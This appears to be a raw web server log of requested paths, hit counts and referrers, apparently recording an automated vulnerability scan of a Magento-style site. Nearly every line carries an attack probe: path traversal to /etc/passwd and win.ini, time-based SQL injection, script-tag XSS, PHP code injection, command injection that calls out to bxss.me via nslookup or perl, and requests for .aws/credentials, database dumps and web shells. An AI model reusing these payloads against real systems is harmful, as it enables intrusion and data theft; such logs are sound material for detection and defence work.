/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/install/wizard/locale/ 1 https://104.36.149.61/
/shvets/ 1 -
/acc/..%2fjs/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/ 1 https://104.36.149.61/
/ySYlYg9o'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/debug.js 1 https://104.36.149.61/
/fUNqAadM'%3b%20waitfor%20delay%20'0:0:15'%20--%20/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/prototype/validation.js 1 -
/echo%20qgtyqm$()\\%20mivjdx\\nz^xyu||a%20%23'%20&echo%20qgtyqm$()\\%20mivjdx\\nz^xyu||a%20%23|\"%20&echo%20qgtyqm$()\\%20mivjdx\\nz^xyu||a%20%23/index.php/install/wizard/config/ 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/skin/install/default/default/css/ie7minus.css 1 -
/acc/skin/install/1some_inexistent_file_with_long_name%00.jpg/default/css/boxes.css 1 https://104.36.149.61/
/jsp/help-sb-download.jsp 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/uploader/ 1 -
/\".gethostbyname(lc(\"hitua\".\"onokyegk346f0.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(115).chr(76).chr(118).chr(82).\"/index.php/install/ 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/scriptaculous/effects.js 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/prototype/extended_debug.js 1 https://104.36.149.61/
/echo%20haweey$()\\%20dduxcr\\nz^xyu||a%20%23'%20&echo%20haweey$()\\%20dduxcr\\nz^xyu||a%20%23|\"%20&echo%20haweey$()\\%20dduxcr\\nz^xyu||a%20%23/skin/adminhtml/default/ 1 -
/admin/ 5 -
/(nslookup%20hittradycsfaiefa37.bxss.me||perl%20-e%20\"gethostbyname('hittradycsfaiefa37.bxss.me')\")/js/prototype/windows/ 1 -
/acc/skin/install/default/default/css<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/reset.css 1 -
/(nslookup%20hitcmvooludaz55c44.bxss.me||perl%20-e%20\"gethostbyname('hitcmvooludaz55c44.bxss.me')\")/js/mage/adminhtml/grid.js 1 -
/.aws/credentials 8 -
/^(%23$!@%23$)(()))******/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/.hgignore 1 -
/acc/index.php/install/wizard/'\"()&%25<acx><ScRiPt%20>6DR8(9344)<%2fScRiPt>/ 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/grid.js 1 https://104.36.149.61/
/acc/js/1some_inexistent_file_with_long_name%00.jpg/ 1 https://104.36.149.61/
/acc/js/mage/.%2fadminhtml/events.js 1 https://104.36.149.61/
/.%2facc/js/prototype/ 1 https://104.36.149.61/
/P9YVEPn1'))%20OR%20308=(SELECT%20308%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/Telerik.Web.UI.WebResource.axd 2 -
/acc/skin/install/1%00%c0%a7%c0%a2%252527%252522/default/css/ie7minus.css 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/translate.js 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/varien/form.js 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/grid.js 1 -
/'\"/js/varien/js.js 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/hash.js 1 -
/jmx-console/ 1 -
/moadmin/moadmin.php 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/!(()&&!|*|*|/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/acc/..%2findex.php/install/wizard/config/ 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/events.js 1 -
/104db.tar 1 -
/acc/js/.%2fmage/adminhtml/hash.js 1 https://104.36.149.61/
/|echo%20nfyrsl$()\\%20qxuddv\\nz^xyu||a%20%23'%20|echo%20nfyrsl$()\\%20qxuddv\\nz^xyu||a%20%23|\"%20|echo%20nfyrsl$()\\%20qxuddv\\nz^xyu||a%20%23/js/varien/form.js 1 -
/acc/index.php/install/..%2f..%2fGemfile 1 -
/%3b(nslookup%20hitnvwbyycxws2a21a.bxss.me||perl%20-e%20\"gethostbyname('hitnvwbyycxws2a21a.bxss.me')\")|(nslookup%20hitnvwbyycxws2a21a.bxss.me||perl%20-e%20\"gethostbyname('hitnvwbyycxws2a21a.bxss.me')\")&(nslookup%20hitnvwbyycxws2a21a.bxss.me||perl%20-e% 1 -
/compass.rb 1 -
/icons/../../../../../../../../../../../../../etc/shells 1 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/product/ 1 https://104.36.149.61/
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500.js 1 -
/acc9727885/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/simple-backdoor.php 1 -
/acc/index.php/install/wizard/beginPost/..%2f..%2f..%2fweb.config 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/backup.js 1 https://104.36.149.61/
/test.php 1 -
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/default/default/css/reset.css 1 https://104.36.149.61/
/acc/index.php/install/wizard/config/..%2f..%2f..%2f..%2fweb.config 1 -
/acc/skin/install/default/default/1%00%c0%a7%c0%a2%252527%252522/clears.css 1 https://104.36.149.61/
/\".gethostbyname(lc(\"hitbp\".\"ebeyqegn2d4b1.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(99).chr(74).chr(121).chr(69).\"/js/scriptaculous/effects.js 1 -
/config/database.yml.sqlite3 1 -
/acc9869414/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc/js/scriptaculous/effects'\"()&%25<acx><ScRiPt%20>mxOU(9589)<%2fScRiPt>.js 1 https://104.36.149.61/
//js/prototype/debug.js 1 https://104.36.149.61/
/LrBTgOUT/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/dump.tar 1 -
/acc/skin/1%00%c0%a7%c0%a2%252527%252522/ 1 https://104.36.149.61/
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/mage/adminhtml/product/ 1 -
/NH6E3BWb'%20OR%2087=(SELECT%2087%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/skin/frontend/ 1 -
/\"+response.write(9322062*9635078)+\"/js/prototype/ 1 -
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/events.js 1 -
/|(nslookup%20hitmkgvdyggcr9ef5d.bxss.me||perl%20-e%20\"gethostbyname('hitmkgvdyggcr9ef5d.bxss.me')\")/js/mage/adminhtml/giftmessage.js 1 -
/acc/index.php/install/wizard/config//./WEB-INF/web.xml%00.jsp 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/sales/ 1 -
/^(%23$!@%23$)(()))******/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost/..%2fweb.config 1 -
/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/skin/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/ 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/prototype/ 1 https://104.36.149.61/
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/browser.js 1 -
/(nslookup%20hittsnciqyolw77692.bxss.me||perl%20-e%20\"gethostbyname('hittsnciqyolw77692.bxss.me')\")/skin/install/default/default/css/clears.css 1 -
/acc'\"()&%25<acx><ScRiPt%20>Lssw(9664)<%2fScRiPt>/skin/install/default/default/ 1 https://104.36.149.61/
/acc/skin/install/default/..%2fdefault/css/ie7minus.css 1 https://104.36.149.61/
/${10000473+9999232}/js/mage/adminhtml/form.js 1 -
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>QlCt(9623)<%2fScRiPt>/accordion.js 1 https://104.36.149.61/
/\"+response.write(9878539*9854552)+\"/js/prototype/validation.js 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/install/default/default/ 1 https://104.36.149.61/
/acc/.%2fjs/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/${@print(md5(31337))}/js/mage/adminhtml/giftoptions/ 1 -
/acc/index.php/install/wizard/config//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passw 1 -
/acc'||'/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/response.write(9274962*9075082)/skin/install/default/default/ 1 -
/acc/js/%3b(nslookup%20hitxoyerwmojq909cb.bxss.me||perl%20-e%20\"gethostbyname('hitxoyerwmojq909cb.bxss.me')\")|(nslookup%20hitxoyerwmojq909cb.bxss.me||perl%20-e%20\"gethostbyname('hitxoyerwmojq909cb.bxss.me')\")&(nslookup%20hitxoyerwmojq909cb.bxss.me||per 1 -
/acc/index.php/install/wizard/../../../../Gemfile 1 -
/acc/%3b(nslookup%20hitidjculeozef88c6.bxss.me||perl%20-e%20\"gethostbyname('hitidjculeozef88c6.bxss.me')\")|(nslookup%20hitidjculeozef88c6.bxss.me||perl%20-e%20\"gethostbyname('hitidjculeozef88c6.bxss.me')\")&(nslookup%20hitidjculeozef88c6.bxss.me||perl%2 1 -
/sites/all/modules/fckeditor 2 -
/iPGM4YBk')%20OR%20394=(SELECT%20394%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
//%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd 1 -
/&echo%20gizaax$()\\%20xpllre\\nz^xyu||a%20%23'%20&echo%20gizaax$()\\%20xpllre\\nz^xyu||a%20%23|\"%20&echo%20gizaax$()\\%20xpllre\\nz^xyu||a%20%23/js/mage/adminhtml/hash.js 1 -
/!(()&&!|*|*|/js/varien/js.js 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/flexuploader.js 1 -
/-1%20OR%203+520-520-1=0+0+0+1/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/%3b(nslookup%20hitsbdzggsvzz5d53f.bxss.me||perl%20-e%20\"gethostbyname('hitsbdzggsvzz5d53f.bxss.me')\")|(nslookup%20hitsbdzggsvzz5d53f.bxss.me||perl%20-e%20\"gethostbyname('hitsbdzggsvzz5d53f.bxss.me')\")&(nslookup%20hitsbdzggsvzz5d53f.bxss.me||perl%20-e% 1 -
/echo%20gfczns$()\\%20ovpjau\\nz^xyu||a%20%23'%20&echo%20gfczns$()\\%20ovpjau\\nz^xyu||a%20%23|\"%20&echo%20gfczns$()\\%20ovpjau\\nz^xyu||a%20%23/skin/frontend/ 1 -
/acc/js/prototype/%3b(nslookup%20hitpjxwbwlgvm629e8.bxss.me||perl%20-e%20\"gethostbyname('hitpjxwbwlgvm629e8.bxss.me')\")|(nslookup%20hitpjxwbwlgvm629e8.bxss.me||perl%20-e%20\"gethostbyname('hitpjxwbwlgvm629e8.bxss.me')\")&(nslookup%20hitpjxwbwlgvm629e8.bx 1 -
/http://bxss.me/t/fit.txt%3F.jpg/js/varien/form.js 1 https://104.36.149.61/
/%3b(nslookup%20hitouqoslbgmhd8f1b.bxss.me||perl%20-e%20\"gethostbyname('hitouqoslbgmhd8f1b.bxss.me')\")|(nslookup%20hitouqoslbgmhd8f1b.bxss.me||perl%20-e%20\"gethostbyname('hitouqoslbgmhd8f1b.bxss.me')\")&(nslookup%20hitouqoslbgmhd8f1b.bxss.me||perl%20-e% 1 -
/1'\"/js/prototype/prototype.js 1 https://104.36.149.61/
/%3b(nslookup%20hitdbkhgkyqgf65388.bxss.me||perl%20-e%20\"gethostbyname('hitdbkhgkyqgf65388.bxss.me')\")|(nslookup%20hitdbkhgkyqgf65388.bxss.me||perl%20-e%20\"gethostbyname('hitdbkhgkyqgf65388.bxss.me')\")&(nslookup%20hitdbkhgkyqgf65388.bxss.me||perl%20-e% 1 -
/acc/%2fxfs.bxss.me/mage/adminhtml/sales/ 1 -
/$(nslookup%20hitvruiissjtje2ae5.bxss.me||perl%20-e%20\"gethostbyname('hitvruiissjtje2ae5.bxss.me')\")/js/prototype/extended_debug.js 1 -
/acc/index.php/install/wizard/beginPost//../../../../../../../../etc/passwd 2 -
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc/skin<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/default/ 1 -
/acc/index.php/install/wizard//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 2 -
/x18NPFua'))%20OR%20297=(SELECT%20297%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/accordion.js 1 -
/GruntFile.coffee 1 -
/'.gethostbyname(lc('hitqz'.'pqulmgrk3438e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(82).chr(101).chr(65).'/js/prototype/windows/ 1 -
/Http://bxss.me/t/fit.txt/js/mage/ 1 https://104.36.149.61/
/acc/%3b(nslookup%20hithyabigwxrqc6452.bxss.me||perl%20-e%20\"gethostbyname('hithyabigwxrqc6452.bxss.me')\")|(nslookup%20hithyabigwxrqc6452.bxss.me||perl%20-e%20\"gethostbyname('hithyabigwxrqc6452.bxss.me')\")&(nslookup%20hithyabigwxrqc6452.bxss.me||perl%2 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/sales/ 1 https://104.36.149.61/
/DJO787Tr'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/extended_debug.js 1 https://104.36.149.61/
/5ot4SmQu'%20OR%20233=(SELECT%20233%20FROM%20PG_SLEEP(15))--/skin/frontend/ 1 https://104.36.149.61/
/components/com_hotornot2/phpthumb/phpThumb.php 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/product/ 1 https://104.36.149.61/
/${@print(md5(31337))}/js/prototype/tooltip_manager.js 1 -
/acc/js/mage/adminhtml/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini.js 1 https://104.36.149.61/
/acc'||'/js/mage/adminhtml/ 1 https://104.36.149.61/
/!(()&&!|*|*|/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/backup.js 1 -
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/giftoptions/ 1 -
//../WEB-INF/web.xml%00.jsp 1 -
/acc/.%2fjs/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc/index.php/install/wizard<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/config/ 1 -
/acc/skin/%2fxfs.bxss.me/default/default/css/iestyles.css 1 -
/\"+response.write(9166394*9259310)+\"/js/prototype/prototype.js 1 -
/acc//mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/backup.js 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/prototype/ 1 https://104.36.149.61/
/\"+response.write(9129642*9897132)+\"/index.php/install/ 1 -
/acc/..%2fjs/scriptaculous/effects.js 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/skin/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/default/css/boxes.css 1 https://104.36.149.61/
/acc/index.php/install/wizard//./WEB-INF/web.xml%00.jsp 1 -
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/accordion.js 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/backup.js 1 -
/health/check 2 -
/..%2facc/js/mage/ 1 https://104.36.149.61/
/WEB-INF%20(copy)/web.xml 1 -
/`(nslookup%20hityuqpunnzbsdda0e.bxss.me||perl%20-e%20\"gethostbyname('hityuqpunnzbsdda0e.bxss.me')\")`/js/mage/adminhtml/backup.js 1 -
/http://bxss.me/t/fit.txt%3F.jpg/skin/adminhtml/default/ 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
//%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\etc/passwd 1 -
/'.print(md5(31337)).'/js/mage/ 1 -
/r57shell.php 1 -
/acc/index.php//../../../WEB-INF/web.xml%00.jsp 1 -
/if(now()=sysdate(),sleep(15),0)/js/prototype/validation.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/prototype/validation.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/../../../../../package-lock.json 1 -
/<!--/js/mage/ 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/skin/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/default/css/iestyles.css 1 https://104.36.149.61/
/acc/js/prototype/windows/1%00%c0%a7%c0%a2%252527%252522/ 1 https://104.36.149.61/
/_mmServerScripts/MMHTTPDB.asp 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(116).concat(76).concat(103).concat(70)+(require\"socket\"%0aSocket.gethostbyname(\"hitbi\"+\"npgkdrde21b41.bxss.me.\")[3].to_s)+\"/index.php/install/ 1 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/ 1 https://104.36.149.61/
/Gemfile 1 -
/acc//mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/prototype/extended_debug.js 1 -
/CMSInstall/install.aspx 1 -
/acc/skin/install/default'\"()&%25<acx><ScRiPt%20>PjTl(9970)<%2fScRiPt>/ 1 https://104.36.149.61/
/104_db.7z 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/index.php/install/wizard/config/ 1 https://104.36.149.61/
/acc/js/mage/..%2ftranslate.js 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/skin/frontend/ 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>QlCt(9227)<%2fScRiPt>/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/install/default/default/css/clears.css 1 -
/-1%20OR%203+548-548-1=0+0+0+1/js/varien/form.js 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/form.js 1 https://104.36.149.61/
/acc/..%2fjs/mage/adminhtml/backup.js 1 https://104.36.149.61/
/104-backup.7z 1 -
//skin/adminhtml/default/ 1 https://104.36.149.61/
/bxss.me/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/acc/js/mage/.%2fadminhtml/backup.js 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd.js 1 https://104.36.149.61/
/acc/index.php'\"()&%25<acx><ScRiPt%20>KhMd(9469)<%2fScRiPt>/install/wizard/config/ 1 https://104.36.149.61/
/104-database.rar 1 -
/PMA/ 1 -
//_mmServerScripts/MMHTTPDB.php 1 -
/thirdparty/fckeditor 2 -
/acc'||'/js/mage/translate.js 1 https://104.36.149.61/
/acc/index.php//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini 2 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/scriptaculous/effects.js 1 -
/'\"()&%25<acx><ScRiPt%20>gJZT(9517)<%2fScRiPt>/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/install/default/default/css/reset.css 1 https://104.36.149.61/
/jscripts 2 -
/acc/..%2fskin/install/default/default/ 1 https://104.36.149.61/
/cgi-bin/php4.cgi 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(101).concat(75).concat(119).concat(74)+(require\"socket\"%0aSocket.gethostbyname(\"hitao\"+\"jrjtnpkhb372a.bxss.me.\")[3].to_s)+\"/skin/install/default/ 1 -
/remote/login 2 -
/104-dump.tar 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'mJg7'!='mJg7%25/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/prototype/validation.js 1 https://104.36.149.61/
/|echo%20yjssyv$()\\%20fhxvxa\\nz^xyu||a%20%23'%20|echo%20yjssyv$()\\%20fhxvxa\\nz^xyu||a%20%23|\"%20|echo%20yjssyv$()\\%20fhxvxa\\nz^xyu||a%20%23/js/mage/adminhtml/form.js 1 -
/acc/js/..%2fprototype/windows/ 1 https://104.36.149.61/
/acc/skin/adminhtml/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/ 1 -
/dup-installer/main.installer.php 1 -
/&echo%20sdsdsn$()\\%20dapurw\\nz^xyu||a%20%23'%20&echo%20sdsdsn$()\\%20dapurw\\nz^xyu||a%20%23|\"%20&echo%20sdsdsn$()\\%20dapurw\\nz^xyu||a%20%23/js/prototype/windows/ 1 -
/cYtQ38Dd'))%20OR%20263=(SELECT%20263%20FROM%20PG_SLEEP(15))--/skin/adminhtml/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/config//../../../../../../../../windows/win.ini%00.jpg 1 -
/acc/.%2fjs/prototype/prototype.js 1 https://104.36.149.61/
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/image.js 1 -
/app/config/database.yml.pgsql 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"0S14\"=\"0S14/js/prototype/windows/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/ 1 https://104.36.149.61/
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/accordion.js 1 -
/\".gethostbyname(lc(\"hitui\".\"dajseknsace05.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(113).chr(67).chr(98).chr(69).\"/skin/install/default/default/css/reset.css 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/ 1 -
/!(()&&!|*|*|/js/prototype/prototype.js 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(106).concat(86).concat(121).concat(74)+(require'socket'%0aSocket.gethostbyname('hitkm'+'fetpkcqu291a4.bxss.me.')[3].to_s)+'/js/mage/adminhtml/browser.js 1 -
/acc/skin/install/default/bxss.me%2ft%2fxss.html%3f%2500/css/reset.css 1 -
/..%2fpackage.json 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/varien/js.js 1 -
/tinymce/jscripts/tiny_mce 1 -
/acc/skin/install<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/default/default/css/reset.css 1 -
/docker-compose.yml 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/sdk 1 -
/acc/index.php/install/..%2f..%2fweb.config 1 -
//..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/windows/win.ini 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/uploader/ 1 https://104.36.149.61/
/adminer.php 2 -
/bxss.me/skin/frontend/ 1 https://104.36.149.61/
/acc/skin/install/default/'\"()&%25<acx><ScRiPt%20>c1E3(9180)<%2fScRiPt>/css/ie7minus.css 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/ 1 -
/${9999288+9999106}/js/mage/adminhtml/uploader/ 1 -
/acc/%2fxfs.bxss.me/mage/adminhtml/ 1 -
/|(nslookup%20hitleworzutlt45562.bxss.me||perl%20-e%20\"gethostbyname('hitleworzutlt45562.bxss.me')\")/js/mage/adminhtml/giftoptions/ 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/prototype/debug.js 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/backup.js 1 https://104.36.149.61/
/cgi-bin. 1 -
/acc/.%2fjs/prototype/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost/..%2f..%2f..%2f..%2f..%2fweb.config 1 -
/!(()&&!|*|*|/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/grid.js 1 https://104.36.149.61/
/acc/skin/install/default/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/boxes.css 1 https://104.36.149.61/
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/windows/themes/ 1 https://104.36.149.61/
/)/js/scriptaculous/effects.js 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/prototype/windows/themes/ 1 -
/acc'\"()&%25<acx><ScRiPt%20>gJZT(9718)<%2fScRiPt>/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/inc/fckeditor 2 -
